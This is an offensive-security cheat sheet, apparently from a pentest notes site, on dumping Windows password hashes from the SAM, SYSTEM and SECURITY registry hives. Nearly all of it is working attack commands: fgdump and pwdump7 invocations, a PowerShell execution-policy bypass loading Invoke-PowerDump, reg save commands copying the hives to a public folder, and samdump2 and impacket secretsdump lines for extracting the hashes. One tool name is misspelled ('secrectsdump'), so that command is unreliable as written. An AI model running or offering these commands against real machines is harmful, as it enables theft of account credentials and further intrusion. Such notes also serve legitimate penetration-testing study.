dump SAM SYSTEM
SAM hash Format
uid : rid : LM_Hash : NTLM_Hash
START /B [fgdump.exe | pwdump7.exe]
powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-PowerDump.ps1; Invoke-PowerDump}"
manually
# actual location
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SYSTEM
# other locations
C:\Windows\System32\config\RegBack
C:\Windows\Repair
reg save hklm\sam c:\Users\Public\ksam
reg save hklm\system c:\Users\Public\ksystem
reg save hklm\security c:\Users\Public\ksecurity
# on kali
samdump2 ksystem ksam
impacket-secrectsdump -sam ksam -security ksecurity -system ksystem LOCAL
Last updated
Was this helpful?